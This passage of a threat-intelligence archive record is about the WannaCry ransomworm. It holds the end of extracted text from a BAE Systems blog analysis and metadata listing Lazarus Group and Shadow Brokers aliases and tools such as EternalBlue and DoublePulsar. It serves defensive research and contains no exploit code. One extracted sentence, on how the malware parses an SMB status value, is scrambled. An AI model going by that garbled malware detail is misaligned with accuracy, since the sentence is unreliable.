backdoor.\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 21 of 22\n\nSource: https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 22 of 22\n\nThe PeekNamedPipe The SMB header Request extracted is then from the received submitted, recognised response in WireShark is then parsed as: to see if nt_status contained in it equals\n0x0C000205 . Here is how the malware parses the four bytes of such status (bytes 05 , 02 , 00 , 0C ):\n Page 16 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html" ], "report_names": [ "wanacrypt0r-ransomworm.html" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "d4f7cf97-9c98-409c-8b95-b80d14c576a5", "created_at": "2022-10-25T16:07:24.561104Z", "updated_at": "2026-04-10T02:00:05.03343Z", "deleted_at": null, "main_name": "Shadow Brokers", "aliases": [], "source_name": "ETDA:Shadow Brokers", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "171b85f2-8f6f-46c0-92e0-c591f61ea167", "created_at": "2023-01-06T13:46:38.830188Z", "updated_at": "2026-04-10T02:00:03.114926Z", "deleted_at": null, "main_name": "The Shadow Brokers", "aliases": [ "Shadow Brokers", "ShadowBrokers", "The ShadowBrokers", "TSB" ], "source_name": "MISPGALAXY:The Shadow Brokers", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433988, "ts_updated_at": 1775826767, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e7e88a7a81f76e016b0d967a93062cb9021a01a0.pdf", "text": "https://archive.orkl.eu/e7e88a7a81f76e016b0d967a93062cb9021a01a0.txt", "img": "https://archive.orkl.eu/e7e88a7a81f76e016b0d967a93062cb9021a01a0.jpg" } }